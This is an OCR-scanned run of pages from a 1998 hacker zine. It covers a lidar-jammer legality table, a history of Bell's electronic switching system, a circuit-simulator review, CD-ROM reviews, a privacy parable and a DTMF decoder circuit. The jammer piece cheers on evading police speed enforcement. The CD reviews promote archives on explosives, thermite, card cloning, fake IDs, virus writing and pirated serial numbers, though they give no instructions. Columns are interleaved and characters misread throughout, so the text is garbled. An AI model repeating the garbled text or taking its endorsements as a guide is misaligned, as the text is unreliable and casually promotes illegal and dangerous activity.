and not know which one to lock onto. It's kind like trying to Virginia - both illegal. In fact, Virgin ia is so anal about
pick out one voice out of a group of 50 people. Fortunately detectorsljammers that you can't even have them in the car
L1DARdoens't need 50 signals to get confused, it only needs functioning or not, period. You might be ok if it's stowed in th~
trunk, unplugged.
two or three, maybe even only one!!!
How wold this be done? Well, we already know that the way You may be wondering about jammers and the FCC. Well,
20 Volume 1 Issue 2 - Fall 1998 THUD
since the frequency at 904nm is so high and the FCC
currently considers anything above 300 Ghz amateur, you're State Detectors Jammers
completely safe. Alabama OK OK
Arizona OK OK
However, just because there is no law specifically against Arkansas OK OK
jamming doesn't mean they (the police or whoever) won't use California OK OK
some obscure law and twist it in their favor, something like Colorado OK OK
obstruction of justice or some other BS. Connecticut OK OK
Delaware OK OK
If you're not completely sure about it, it won't hurt to check District of Columbia ILLEGAL ILLEGAL
with your local law enforcement service to find out. Be safe, Florida OK OK
and happy speeding!!! Georgia OK OK
Hawaii ?? ??
Idaho OK OK
Weblistings Illinois OK OK
Indiana OK OK
http://www.afn.org/-afn094441scanlaws/index.html Iowa OK OK
Mobile Scanner & Radar Detector Laws Kansas OK OK
Kentucky OK OK
http://www.a-concepts.com/ Louisiana OK OK
Applied Concepts, Inc. Maine OK OK
Maryland OK OK
http://www.lasertech.com/apps/speed.html Massachusetts OK OK
Laser Measurement for Speed Enforcement Applications Michigan OK OK
Minnesota OK ILLEGAL
http://data.detnews.com/1997/discover/ Mississippi OK OK
9706/17/06160022.htm Missouri OK OK
The law plays laser tag Montana OK OK
Nebraska OK OK
http://www.alpworld.com/kubby98/pr/970625.html Nevada OK OK
Press Release : THE CHP's PHONY WAR ON SPEEDERS New Hampsh ire OK OK
New Jersey OK OK
http://www.telstarone.com/photo_fog_laser_shield.htm Mew Mexico OK OK
Photo Fog, Laser Shield , The Protector - Anti Flash Photo New York OK OK
Radar Fluid North Carolina OK OK
North Dakota OK OK
http://www.speedtrap.com/info.html Ohio OK OK
The Speed Trap Registry Oklahoma OK ILLEGAL
Oregon OK OK
http://www.21stcenturyplaza.com/mobile/radar.html Pennsylvania OK OK
Radar- Laser Detectors Rhode Island OK OK
South Carolina OK OK
South Dakota OK OK
Tennessee OK OK
Texas OK OK
Utah OK OK
Vermont OK OK
Virginia ILLEGAL ILLEGAL
Washington OK OK
West Virginia OK OK
Wisconsin OK OK
Wyoming OK OK
As you mayor may not have noticed, our cover logo changed with this issue. One of the readers decided he could
do a better job than us so he created his own version of the THUD logo and sent it to us. We liked it so much, we
decided to go ahead and use it starting with this issue.
Thank You McPunk
Now, since we figured out that our biggest resource is our very own readers, we decided to ask everyone to go ahead
and send in their own artwork if they'd like to help us out.
Along with unique artwork, we're also on the lookout for photographs, projects, schematics, diagrams, articles and
other such useful material for print in our magazine.
50 far, the interest in THUD has Increased exponentially since It's release. We're going to do our best to keep you
guys happy, so send in any comments, arguments, complaints, print material, gadgets, etc.
We LOVE to hear from you guys.
P.5. We'd like to do an article titled, "THE EVIL HACKER" commenting and outlining how the mainstream media has
taken the hacker name and turned it upside down, equating hacker with the likes of a common thief or a mugger. You
get the Idea. Anyhow, we'd like to ask for some help on this one . We're taking complete and/or Incomplete material
on this sublect,
THUD Volume 1 Issue 2 - Fall 1998 21
®~=============================~®
Tl1e Historl1 of £SS by : Lex Luthor
Of all the new 1960s wonders of telephone technology - the national network would be unable to meet the demand. In
satellites, ultra modern Traffic Service Positions (TSPS) for November 1963, an all-electronic switching system went into
operators, the picturephone, and so on - the one that gave use at the Brown Engineering Company at Cocoa Beach,
Bell Labs the most trouble, and unexpectedly became the Florida. But this was a small installation, essentially another
greatest development effort in Bell System's history, was the test installation, serving only a single company. Kappel's tone
perfection of an electronic switching system, or ESS. on the subject in the 1964 annual report was, for him, an
almost apologetic: "Electronic switching equipment must be
It may be recalled that such a system was the specific end in manufactured in volume to unprecedented standards of
view when the project that had culminated in the invention of reliability.... To turn out the equipment economically and with
the transistor had been launched back in the 1930s. After good speed, mass production methods must be developed;
successful accomplishment of that planned miracle in 1947- but, at the same time, there can be no loss of precision..."
48, further delays were brought about by financial stringency Another year and millions of dollars later, on May 30, 1965,
and the need for further development of the transistor itself. the first commercial electric central office was put into service
In the early 1950s, a Labs team began serious work on at Succasunna, New Jersey.
electronic switching. As early as 1955, Westem Electric
became involved when five engineers from the Hawthome Even at Succasunna, only 200 of the town's 4,300
works were assigned to collaborate with the Labs on the subscribers initially had the benefit of electronic switching's
project. The president of AT&T in 1956, wrote confidently, "At added speed and additional services, such as provision for
Bell Labs, development of the new electron ic switching three party conversations and automatic transfer of incoming
system is going full speed ahead. We are sure this will lead to calls. But after that, ESS was on its way. In January 1966,the
many improvements in service and also to greater efficiency. second commercial installation, this one serving 2,900
telephones, went into service in Chase, Maryland. By the end
The first service trial will start in Morris, III., in 1959." Shortly
thereafter, Kappel said that the cost of the whole project of 1967 there were additional ESS offices in California,
would probably be $45 million. Connecticut, Minnesota, Georgia, New York, Florida, and
Pennsylvania; by the end of 1970 there were 120 offices
But it gradually became apparent that the development of a serving 1.8 million customers; and by 1974 there were 475
commercially usable electronic switching system -in effect, a offices serving 5.6 million customers.
computerized telephone exchange - presented vastly greater
technical problems than had been anticipated, and that, The difference between conventional switching and electronic
accordingly, Bell Labs had vastly underestimated both the switching is the difference between "hardware" and
time and the investment needed to do the job. The year 1959 "software"; in the former case, maintenance is done on the
passed without the promised first trial at Morris, Illinois; it was spot, with screwdr iver and pliers, while in the case of
finally made in November 1960, and quickly showed how electronic switching, it can be done remotely, by computer,
much more work remained to be done. As time dragged on from a central point, making it possible to have only one or
and costs mounted, there was a concem at AT&T and some- two technicians on duty at a time at each switching center.
thing approaching panic at Bell Labs. But the project had to
go forward; by this time the investment was too great to be The development program, when the final figures were added
sacrificed, and in any case, forward projections of increased up, was found to have required a staggering four thousand
demand for telephone service indicated that within a phew man-years of work at Bell Labs and to have cost not $45
years a time would come when, without the quantum leap in million but $500 million!
speed and flexibility that electronic switching would provide,
This article was reprinted from the Group 42 Sells Out CORaM with permission. You NEED to take a
look at this CORaM/It's FULL of great info. Check out the review in this issue (on page 26)
"Group 42 Sells Outf The Information Archive"
Price $49.00 US, $69.00 CAN
1390 N. McDowell Blvd #6142, Petaluma, CA 94954
Email: group42@sonic.net
URL: http://www.sonic.netl-group42
No, not like that!
IFYOU'VE GOT 'PICTURES, ARTICLES, LETTERS, ARTWORK
(GRAMIC OR LINE ART), IDEAS OR COMMENTS••••
CONTACT US RIGHTNOW, DAMNIT!
22 Volume 1 Issue 2 - Fall 1998 THUD
@®[fJ0QD~@[llll[ll®[fJ~@0 .................~~
2430 JUAN TA 0, NE '259, A Q, NM 7112
P.O. Box 23097, ABQ, NM 87192
Voice: 505-237-2073 (9.6, M·F)
Fax: 505-292-4078 (all hours, orders only) r:-.1!fIII~~~""""
wwwtsc-global.com
Add $5 total S/H (US, Canada)
10~Offorders $100+ CATALOG is $3 w/ order , $1 w/ 0
PostalMOis fastest VISA, MCOKCOD, add $7
I-NEW CATALOG FEATURES
200+ HI-TECH PRODUCTSI
WILL ROCK YOUR WORLDI
'1 w/ ORDER, '3 w/O
THUD Volume 1 Issue 2 - Fall 1998 23
·ELECTRONIC WORKBENCH 5.0
as reviewed by Solar Prophet
Electronics Workbench The simulation engine is an interactive 32-bit SPICE 3F5
Interactive Image Technologies,ltd. program. There are no preset limits on circuit size and
111 Peter St., Suite 801 complexity . You will only be limited by your computer
Toronto, Ontario, Canada M5V 2H1 processing power. The user interface is the click-and drag
Sales: 800 263-5552 type with automatic wire routing yet allows the user to
Tel: 416977-5550 manually adjust routing to their liking. There is no limit to
Fax: 416977-1818 schematic size.
E-mail: ewb@interactiv.com
WWW: http://www.interactiv.coml
System Requirements:
EWB will run on Windows '95, NT. It will also run under _iiiiiiiiiiiiiiiiiiiiiiiiiiiiiii iiq
Windows 3.1x with Win32s v1.30 or later installed. It will
install on any of these operating systems as long as the
computer meets the minimum requirements to run those
operating systems. It will take up about 20 megs of hard drive
space. A single user license will run about $300 dollars. This
may seem like a lot of money to spend on a piece of software
but I have found it to be an invaluable tool to quickly try out
ideas withou having to actually build it. It can also save money
as you can test a design that you don't even have the parts for
yet!!! For more information on multiple user licenses or for the
other versions of Electronics Workbench, visit Interactive's
web site at http://www.interactiv.com/.
_ID_.. _
a=------------------ii3JI •
n._...
~ _ _
~ _~ -A l kH1 dilld. pohe .. ~_
~.. ... ~ _ Oodo... poo-..-,.
~IIKe • ..."fII--.poIM ... cokOf •
This is another sample file from EWB. This one shows a
stepper motor driver circuit. It is a digital design using discreet
logic gates and clock with a clock source. LEDs are used to
indicate the status of each of the four outputs.
There are 14 different analyses types allowing one to test a
circuit design to meet even the most stringent criteria. Among
the analyses available are Fourier, Noise, Distortion, Worst
Case and Monte Carto analyses.
Here's one of the sample files that comes with EWB. It's a
Colpitts oscillator that runs at about 2MHz. The oscilliscope in Components:
the lower left comer shows the first few microseconds after There's a sh'load of components available. I have yet to even
power is applied. EWB accurately shows how the circuit try them all. Some of them are obscure parts that I've not had
output starts at DC and within a few microseconds begins to a need for. But it's nice knowing they're there because one
oscillate, reaching maximum amplitude in only about 10 never knows . I'm sure everyones idea of essential
microseconds . It's possible to change the value of components is different from the next Joe.
components on the fly while the simulation is running. EWB
will automatically restart the simulation so you can see the First there's the sources. There's DC and AC voltages and
results of the changes. Makes finding the right part values a currents. voltage controlled voltages and currents, current
snap. This sample is an example of running the simulation in controled voltages and currents, AM and FM sources, Vcc
a one shot mode, that is only long enough to sweep the and grounds, clocks, and several others.
oscilliscope display once, then pauses.
1.- ----1 Next is a comprehensive collection of basic parts. These are
Overview: resistors, capacitors, inductors, transformers, various types of
Electronics Workbench 5.0 is one heck of an awesome piece switches, and relays. There are even variable versions of
of software. It is a mixed signal SPICE simulator that has a these parts.
100% graphical user interface. No need to learn SPICE
command line syntax. There are several versions available, The semi-conductor section is great. There's a large selection
Professional, Personal, and Educational versions. We will be of diodes, zeners, LED's, Diacs, SCR's, triacs, and bridges.
discussing the Educational version. This software will allow Among the available transistor types are NPN, PNP, BJT, N
you to design, test, and analyse analog, digital, or mixed and P channel JFETs and MOSFETs
circuits . The component libraries are larger than most
electronics stores inventories and the analysis equipment There's also several analog IC's; op-amps, comparators and
available to the user would cost a small fortune if you were to voltage regulators.
buy them for your bench.
24 Volume 1 Issue 2 - Fall 1998 THUD
~~~~~~~':::::~~~~~----:-~ the appropriate pull down menu, click on it and drag it to the
l.il!l desired location on the screen. Connecting parts is easy. All
J!!!!!] one has to do is point to the end of the pin on a component
_::iiiiiiiiiiiiiiiiiiiiiiiiiiiii~ .q and click and drag the connection to the second component.
It's also possible to simply drag a connection to the middle of
an existing wire and have it tie into that line automatically.
Once you have your circuit designed a simple mouse click on
the power switch in the upper right corner turns on your
circuit. If you have an oscilloscope or other display device
you'll immediately see you're circuit in action. LED's light up,
7 segment displays work, and any virtual test equipment gives
~=~~~~!!!1!!!!!!!I!lI!ll~I " accurate indications of the conditions in your circuit.
Here's another sample from EWB. This is a stereo amplifier
circuit using op-arnps. The oscilliscope is showing both the
input and output signals so that the amount of gain is
apparent. It shows that EWB can simulate even moderately
complex circuits. Of course, the program is capable of even
more com lexi .
In the mixed analog/digital component bag there's NO and ~;~;~;;;:::::~~=======
D/A converters, and the 555 timer chip.
Individual logic gates are available as well with AND, NAND,
OR, NOR, XOR, XNOR, buffers, and schmidt triggers.
Indicators such as LED's (red, green and blue), light bulbs,
probes, 7-segment displays (both decoded and un-decoded),
buzzers and bar graphs.
There's some control devices avaiable as well like
differentiators, integrators, and gain blocks plus much more!!
In the miscellaneous bag there's fuses, transmission lines ~=~~~~!IIIII!~.!1!!!:!~
(lossy and lossless), crystals, DC motors and even a few r::
types of vacuum tubes!!!
The individual ICs supported are too numerous to list, It
should suffice to say that there's well over 100 74xxx series ~.;:=;::::i~~~=~~~~=:::;==:::;:=:;,::;:::;:~
chips and nearly 50 4xxx series CMOS. There's so many Here's a quick little circuit that we made ourselves. It's just a
components available that I had occasion to design a circuit simple 555 timer IC generating a clock signal to drive a 74192
only to find out that one of the parts I used was considered decade counter and display. This is an example of EWB's
'obsolete' and not carried by my local electronics shops. I ability to simulate circuits with both analog and digital
finally found the part via mail order adn the circuit I eventually components. It also shows a decoded 7 segment display in
buit worked as designed in EWB. action.
Using The Program:
Using the software is easy, especially for those comfortable It's just like working in your own high tech, high budget lab.
with graphical user interfaces. I found the program to be very You have all sorts of components available to you and all the
intuitive and when I needed help, the built in help menus necessary equipment to test and analyse your design. You
guided me along just fine. In fact. if you highlight a component are limited only by your imagination. If you are a serious
you can get help for that component, including truth tables. electronics hobbyist and have the dollars to spare, this
program is a definate must get. Besides, it's just plain fun to
To build a circuit all one has to do is locate the desired part in use!!!
T-Shirts are available now!
These shirts are officially endorsed by Blacklisted/ 411
Magazine
WHXTE LETTERXNG ON A BLACK SHXRT
I.E HAVE LARGE AND EXTRA LARGE SHXRTS XN STOCK
TCE Information Systems We Also offer several other t-sh irts , products and other
P.O. Box 5142 serv ices you may find useful: EPROM Copy ing Service,
Los Alam itos , CA 90271 6.50Mhz and 6.5536Mhz Crystals, WWW link list on disk.
THUD Volume 1 Issue 2· Fall 1998 25
CD-ROM REVZEWS
ZF..J 8. GLt2
Iron Feather Journal
Double CD Set
"Choonz & Warez"
Now for the goodz. Just take a look through the resources
3~TflAlJKS section and you're gonna find all sorts of philes on hacking,
cracking, phreaking, survival, information warfare, even drugs
TWO (JISIJS (although I personally think that could have been left out).
IlION FEATHER's There's even a whole section on MIDI hacks. This CD really is
musically oriented and influenced. There's also a section
which is taken from the Group 42 Sells Out CD-ROM. There's
also some religious works for all you philisophical types. Oh,
and lest I forget , there's also a nice big list of serial
numberz no warez archive can be without your serial
numberz they make the world go round!!!
I thoroughly enjoyed the 2 CD sel. The music was great and
the information useful. This is definately an all around try to
please everybody piece of work that I think definately
succeeds in doing so.
Group 42
Single CD
"Group 42 Sells Out!"
AFTER 12 YEARS AS THE MOST ELUSIVE UNDERGROUND
INFORMATION COURIERS, THIS ORGANIZATION SURFACES
®
I must say I found IFJ's double CD set very refreshing. AND RELEASES ITS KNOWLEDGE TO THE PUBLiC .....
Althugh it does not contain as much raw data as on other
warez related CD's I've seen this one makes up for it by
introducing me to some unusual musical talents.
Group Sells Outl
There are two CD's in this sel. The first is all music, the
second is a mixed media ROM and audio. All together there
are 36 audio tracks. Many of them are justlitlle 10-15 second The Information Archive ~
shorts. There are, however, some very professional and very
This CD· ROM contains l 00 's of megs of information and the
well composed tracks that I thought were very good. Among
software neces sary to use it. Much of this knowledge has
my personal favorites were "Hall of the Inverted Mushroom" never befor e been available to the public. This information is
by Multicast, "The Birth" by Feral, and a really cool remix of presented in a clear and organ ized manner , fUlly docume nted and
the AC/DC song "Dirty Deeds Done Dirt Cheap" called viewable on any make of compute r with any WWW BROWSER .
"Deadly Deeds" done by Deadly Buda. All in all you should
force yourself to take the time to listen to these examples of This Is Not Shovelwarel For Educational Purposes Only.
audio artistry. You may be surprised at you you may find you NO SALES TO MINORS I YOU MUST BE 18 TO PURCHASE THIS CO-ROM
like! Oh, and you'll find a track of Red Bozx quarter tones, The authors of thl. CD-ROM disc and thei r agents do not. In any way, advocat e the
too!!! :) Imple mentati on of any of the Informa tion containe d her.ln and • • • ume NO lia bili ty
fo r I ny damag•• or Injury wh ich may res ult from the us. or misu s. there of1
Anyway, on to the Warez!!! The ROM portion is all set up in NOT FOR EXPOR T OUTSIDE THE U.S. OR CANADA $49.00 US ($69.00 CAN )
HTML code so all you have to do is load up your favorite web
browser and load up the index.html file. From there you can Group 42 has finally put out a CD-ROM and is it ever a
navigate your way around the CD and find all sorts of useful winner. This single CD is so full of information it's gonna take
info. There is such a large array of different items that I'm sure a while to look through it all. But believe me you are bound to
there's gonna be something useful to be found for everyone. find something of interest, even if you're not a hacker. The CD
is in HTML format so it's extremely easy to view and navigate
In one section you'll find tons of images. There's various through the disc and find exactly what you want in only a few
logo's and pies of people, posters, places, and things that minutes. Just open up your favorite browser and open a new
probably were influenced by vast amounts of illegal file, selecting INDEX.HTM from the main directory of the
substances from the sixties!! Also, you'll find animated GIFs Group 42 disc.
as well in addition to some tileable cells which are excellent
for backgrounds on webpages . All these images are I'm sure some of you who are familiar with Group 42 are
presented for your use. It's a great little source of material for wondering why they would make a CD. Well, let me just quote
spicing up your webpage or personal publications. a paragraph from a section of the CD that describes what
Group 42 is all about: "The members of Group 42 are getting
Next, your gonna find one hell of a huge section on audio older with ages spanning from 26 to 31. Most of us have
files. We're not talking your simple pile of strange and bizarre careers and new families to deal with now and can't afford to
sound .WAV files, although there is quite a collection of those. explore the system at the levels we once did. Especially in the
There's a large collection of MIDI files as well. There's even a light of new laws that tend to make everything illegal, and law
few Real Audio files for your listening pleasure. And for all you enforcement that seems to only enforce laws when it deems it
home audio studio technophile types you're gonna find some necessary. So it was decided that we would package some of
drum loops and groove samples for your favorite drum our information and warez, combined it with some other
machines. Heck, there's even some files on how to hack your critical warez and infos that are available, and offer it to
favorite drum machine. Oh, you'l also find a couple of MOD anyone who wanted it in an easy to read and accessible
files too, although I would have liked to have seen more. I formal." Enough said on that.
personally know there's some really awesome stuff that was To start with there's a section on Anarchy.!n this area you're
gonna find all sorts of info about chemicals, how to make
26 Volume 1 Issue 2· Fall 1998 THUD
various explosives, pranks and practical jokes you can play
on others to annoy the shit out of them, how to defraud coin The FAa's section is pretty self explanatory. In here you'll find
machines, varios smoke formulas for those great smoke all sorts of hacker and phreaker related FAa's. There's so
grenades we all love, how to make thermite, the Unabombers many FAa's out there on the net covering just about every
Manifesto, info on how to spy on people, and my favorite, the subject you can think of, but only a few dozen are presented
SPUD gun!!! yeah, baby! on this disc. Rest assured , if you want to know about
something computer, telephone, or software related, you'll
Under the Communications section you're gonna find find it here. There's even a copy of the popular 2600 FAa.
everything you ever wanted to know about electron ics
communications, how to tap into it, how to defeat it, and how Hacking is quite a big area. This area also has a lot of FAa's
to use it to your advantage. There's sections on cell phones, listed. The number of computer and operating systems listed
pirate radio and TV, bug detectors (great for those who are in this area is really astounding. There's even info on how to
afraid of the FBI, CIA, NSA, etc...), a legal section explaining hack into those old CORVUS systems for the early Apple
some of the ins & outs of what's technically right and wrong to computer days. You remember those, don't you? There's also
do with intercepted communications. Also including is some many files on how to break into various BBS software
info on telephones although you'll find more unre the packages. These files were useful to both the hackers and the
Phreaking section. sysops alike.
Under the Computers area you'll find some cool shit. You'll The Internet section is a gold mine of information on how the
find all sorts of PC related stuff, including info on all your com internet works an how to sneak your way around it. There's
ports and how to program them, files on how to decode the info on both the public and military parts of the net. It's also a
GIF image file formats , some programming info mostly good history lesson of how the net got started in the first
dealing with 3D stuff, including the complete source code for place.
that awesome game Castle Wolfenstien 3D! Another fairly
large section deals with those wonderful little PIC chips. The Lockpicking section is kinda small but there's really not
Severl different kinds are discussed and once you read about much to picking a lock. It's just that there's so many different
these handy little devices you're gonna want to go and and kinds. They all work on a few basic principles and you'll find
invent a use for one ust so you have to buy them yourself. that info here. Many types of mechanical and even electronic
There's some other miscellaneous stuff as well including an locks are discussed.
intersting article about what's been called the "Oh-My-God
Particle". You gotta read that one. The Miscellaneous section is just that, but there's three main
subsections. One is political works. You'll find all sorts of files
The Cracking section is spilt into two parts, one referring to on various politically related subjects and you'll find many
cracking of passwords and the other about cracking famous papers written here in their entirety, covering things
software.ln the first case you're gonna find all you need to as wide ranged as the Constitution of the United States and
know on how to crack passwords on various types of the Communist Manifesto. The next section covers religious
computers and operating systems. l'ts really an insight to the works. Here you'll find the major written works from many
stupid ways people think they are securing their documents. major religions including Christianity , Budhism , Muslim,
Everyone who thinks they have an unbeatable password had Hindu, and others. The last are is the Miscellaneous
better read this one. The second area deals with cracking the Miscellaneous . It's pretty much self explanatory...there's
copy protection on software programs. This is widely used to some prety interesting stuff here.
allow copies to be made for backup and storage purposes.
you're also gonna find huge lists of serial numbers and I'm Phreaking. Ah yes, the art of sneaking ones way around the
sure your software is listed. telephone system. It's here, just about all of it. You're gonna
find information on every colored box you've ever heard of
The Credit section is also a must read. Of course much of the and quite a few you haven't. There's info on phone tapping
info is on how credit cards and other magnetic cards work, and detecting taps, files on how to make and detect DTMF
and can be stolen and duplicated, you should read this if YOU tones. If your'e interested in getting into PBX's, voice mail, or
have credit cards. The info on this disc will help you protect the ESS system, it's here.
your valuable credit card information as well as info on how to
pull your credit reports and have them corrected if they are in The Survival section is not necessarily about surviving a
error. There's also information on ATM cards.You'lI also find a nuclear war, it's more abou tsurviving hte information age.
copy of AOHell. :) Btw, doesn't it suck that AOL bought ICa? Information is the new moeny of the coming millenium and
information is waht will either save us or condemn us. Leami
Cryptography is one section of great interest to me. In here how to survive by reading up in this area.
you're gonna find everything you ever wanted to know about
how to encode your files and protect them from prying eyes. The Utilities section is a bit small and pretty much only deals
You'll also find out how to decrypt various encoding schemes with compression programs such as PKZip. It's also pretty
so you can better understand the need for high level much strictly PC oriented as well.
encyption. There's even a copy of Pretty Good Privacy, a very
common program that has become a de facto standard for The Virus section is a must read for all those who swap files
people to send private files across the intemet. You're also as more as they swap spit. What YOU'll find in here are files
gonna find information about DES, the govemments offering and programs on how to make your very own viruses. Be
on an ecryption standard, HA! There's even files on the careful not to crash your own system, or anyone elses. Irs a
Clipper chip. good leaming experience to find out how to protect yourself
from others.
The Drugs section pretty much speaks for itself. Here your
gonna find out the scoop on all sorts of illicit drugs, both Warez is a nice section. It covers everything you wanted to
natural and synthetic. I personally don't condone the use of know about how to crack a program so you can use it
such vices but the info is here non-the-Iess for your education. yourself. There's also information on where to find warez on
the intemet. If you have a program that simply needs a
The Electronics area is a small section containing registration code or serial number you'll find lists of working
miscellaneous designs and schematics on things like codes.
theramins, voice scramblers, adn IR remote controls. Weapons is a varied subject and in here you'll find info on
everything from tiny .22's to full sized nukes. There's files on
Under Fake ID's you're gonna find out just how easy it is to tear gas, chemical weapons, pyrotechnics, and stunguns.
assume a new identity. All the information you need is here to There's also some files regarding the legal issues of various
get new or fake drivers licenses, social security numbers and weapons.
other forms of 10. It's really scary how vulnerable we are to
someone who has access to these numbers. The World section appears small but it has various years of
THUD Volume 1 Issue 2 - Fall 1998 27
the CIA World Factbook.This is a great resourceon every nation of the world. There's also a report on the 1990 US Census.
Another good file to read in here is the Tipz From a 28 Year Old Boyscout.
The final section, Zines, covers other sourcesof hacking and phreaking related info, both printed and electronic. This is a great
starting to to building a collection for your library. If this CD didn't have what you wanted then go here to find other sources of
information that may have what you need. It's a big world out there and obviously you can't fit everythingon one CD...yet. :)
All in all the Group 42 Sells Out CD-ROM is a must for anyone who is interested in the above subjects. To get your very own
copy contact:
"Group 42 Sells Outl The Information Archive"
Price $49.00 US, $69.00 CAN
1390 N. McDowell Blvd #6142
Petaluma, CA 94954
group42@sonic.net
http://www.sonic.neV-group42
A Parable
By Perry E. Metzger
There was once a far away land called Ruritania, and in Ruritania there was a strange phenomenon - all the trees that
grew in Ruritainia were transparent. Now, in the days when people had lived in mud huts, this had not been a problem,
but now high-tech wood technology had been developed, and in the new age of wood, everyone in Ruritania found
that their homes were all 100% see through. Now, until this point, no one ever thought of allowing the police to spy on
someone's home, but the new technology made this tempting . This being a civilized country, however, warrants were
required to use binoculars and watch someone in their home. The police, taking advantage of this, would get warrants
to use binoculars and peer in to see what was going on. Occasionally, they would use binoculars without a warrant,
but everyone pretended that this didn't happen.
One day, a smart man invented paint - and if you painted your house, suddenly the police couldn't watch all your
actions at will . Things would go back to the way they were in the old age - completely private.
Indignant, the state decided to try to require that all homes have video cameras installed in every nook and cranny.
"After all", they said, "with this new development crime could run rampant. Installing video cameras doesn't mean that
the police get any new capability - they are just keeping the old one."
A wise man pointed out that citizens were not obligated to make the lives of the police easy, that the police had
survived all through the mud hut age without being able to watch the citizens at will, and that Ruritania was a civilized
country where not every1hing that was expedient was permitted. For instance, in a neighboring country, it had been
discovered that torture was an extremely effective way to solve crimes. Ruritania had banned this practice in spite of
its expedience . Indeed, "why have warrants at all", he asked, "if we are interested only in expedience?"
A famous paint technologist, Dorothy Quisling, intervened however . She noted that people might take photographs of
children masturbating should the new paint technology be widely deployed without safeguards, and the law was
passed .
Soon it was discovered that some citizens would cover their mouths while speaking to each other, thus preventing the
police from reading their lips through the video cameras . This had to be prevented, the police said. After all, it was
preventing them from conducting their lawful surveillance. The wise man pointed out that the police had never before
been allowed to listen in on people's homes, but Dorothy Quisling pointed out that people might use this new invention
of covering their mouths with veils to discuss the kidnapping and mutilation of children . No one in the legislature
wanted to be accused of being in favor of mutilating children, but then again, no one wanted to interfere in people's
rights to wear what they liked, so a compromise was reached whereby all homes were installed with microphones in
each room to accompany the video cameras. The wise man lamented few if any child mutilations had ever been
solved by the old lip reading technology, but it was too late - the microphones were installed everywhere.
However, it was discovered that this was insufficient to prevent citizens from hiding information from the authorities,
because some of them would cleverly speak in languages that the police could not understand. A new law was
proposed to force all citizens to speak at all times only in Ruritanian, and, for good measure , to require that they speak
clearly and distinctly near the microphones. "After all", Dorothy Quisling pointed out, "they might be using the
opportunity to speak in private to mask terrorist activitiesl" Terrorism struck terror into everyone's hearts, and they
rejoiced at the brilliance of this new law.
Meanwhile, the wise man talked one evening to his friends on how all of this was making a sham of the constitution of
Ruritania , of which all Ruritanians were proud, "Why", he asked, "are we obligated to sacrifice all our freedom and
privacy to make the lives of the police easier? There isn't any real evidence that this makes any big dent in crime
anyway I All it does is make our privacy forfeit to the state!"
However, the wise man made the mistake of saying this, as the law requlred , in Ruritanian, clearly and distinctly, and
near a microphone . Soon, the newly formed Ruritanian Secret Police arrived and took him off, and got him to confess
by torturing him. Torture was , after all, far more efficient than the old methods, and had been recently instituted to stop
the recent wave of people thinking obscene thoughts about tomatoes , which Dorothy Quisling noted was one of the
major problems of the new age of plenty and joy.
28 Volume 1 Issue 2 - Fall 1998 THUD
P~O'SE~ rr.H.u.D.
8 Digit DTMF Decoder/Display
By Orion
DTMF decoders can be used in a multitude of applications . display . This is an easy job to do especially since we don't
One could be to log any calls being made ona phone line plan on decoding any codes higher than this. A single NAND
while one is away. Another is to detect control data for gate from the 7400 is used to detect a high condition on
autopatches or other devices sent over radio. This circuit can weighted ouputs '2' and '8' (decimal 10) from the 145436.
be used in nearly any situation where DTMF tones are used. Normally , the output of the NAND gate is high, but when the
It is designed to display the eight most recent DTMF numbers '2' and '8' go high, the output will go low. The output of the
that the circuit detects. It is very simple in it's construction and 7400 goes to one input of each of four AND gates in the 7408.
although it appears to have many parts, in reality it's just that The other input of each gate is connected to the binary
a simple circuit is repeated several times. Theory of operation outputs from the DTMF chip. Since the output from the NAND
is also very simple. This circuit is designed to detect the gate is normally high, the outputs continue through the AND
standard DTMF digits 0 through 9. Although " #, and A gates unchanged. But, when a hex 'A' output is detected by
through D exist, it would have required much more complex the NAND and it's output goes low, it basically cuts off the
and expensive display circuitry to be able to display them. In output of the AND gates, effectively converting a binary 'A' to
theory, it is quite easy to decode these digits as well and the a '0'. Now, when the DTMF decoder chip detects a '0', it
reader is highly encourage to attempt to make the necessary ouputs 'A' which gets detected an dcoverted back to a '0'.
changes to do so. Digits '1' through '9' are unchanged.
Detecting DTMF tones Storing the numbers
The heart of the circuit is the Motorola MC145436 DTMF Since we want to be able to display a sequence of digits for
decoder chip. This 14 pin IC only requires a 3.797545Mhz easier reading, we need some way of storing the decoded
crystal and 1meg resistor for normal operation. It will decode digits. We accomplish this by using the 74164 shift register.
all 16 standard DTMF combinations and output the value on a This chip is a serial in serial/parallel out type shift register.
4 bit binary bus. There is a data valid pin which is used to tell That is, a single bit of data can be stored and upon a clock
other circuity that it has decoded a valid DTMF tone: Also of signal, shifted to the next memory cell. This particular one has
use is a guard time select pin which basically controls how 8 registers, and an output on each register. When a clock
long the tones must be present before the 145436 will signal is recieved, whatever data is on the serial input pin will
consider it a valid signal. With this enabled, the chip can be be stored in memory location A. The contents of A is shifted to
used in relativly noisy enviroments , however, if the tone B; B to C; C to D, D to E, E to F, F to G, and G to H. Whatever
sequence is too fast, the chip will not be able to detect them. contents were in cell H are lost, ahving been replaced by the
I found the chip more than reliable enough to detect 40ms contents of cell G before it.
DTMF pulses seperated by 40ms spaces. There are a couple
of other pins ont he chip as well. One is for an alternate time Since the output from the DTMF decoder is 4-bit binary, we
base which is linked to the same pin on other 145436's so that can use four 74164's to store 8 digits worth of data. Each of
multiple chips can use the same crystal, thus saving cost. The the four binary outputs go to the input of one shift register.
only other pin of note is the crystal enable, which simply tellsThe DATA VALID output of the 145436 is connected to the
the chip it's using its own crystal. Of course, there's also clock inputs of all four registers. With this arangement , we
power pins. have four registers, each outputing the last eight bits of data
for each of the weighted binary lines, all together outputing 8
Input to the chip should be accomplished through appropriate sets of 4-bit binary numbers. Each shift register only handles
filtering and isolation. Input should be AC coupled, that is the data on one line of the binary outputs from the decoder
there is a small value capacitor is series with the input. circuit.
Connection to a telephone line would involve more circuitry to
isolate and perhaps amplify the audio signals. When the decoder detects say a '5' which is binary 0101 , the
first bit (0) goes to the first shift register, the second bit (1)
DTMF digit binary output decimal value goes to the second shift register, the third bit (0) goes to the
1 0001 1 third shift register, and the last bit (1) goes to the fourth shift
2 0010 2 register. This data is then stored into the first cell of each
3 0011 3 register and the contents of the cells are shifted to the right by
4 0100 4 OO~ •
5 0101 5
6 0110 6 Now , each register has eight outputs A through F,
7 0111 7 corresponding to eight digits of storage. We take output A
8 1000 8 from each shift register chip, basically A1, A2, A4, A8 and
9 1001 9 these form a 4-bit binary digit. The B's from each register
0 1010 10 simalarly form another digit, right on down through H, for a
1011 11 total of eight digits.
# 1100 12
A 1101 13 A final addition to the shift registers is that a switch should be
B 1110 14 connected to the clear pins of each chip and to ground . This
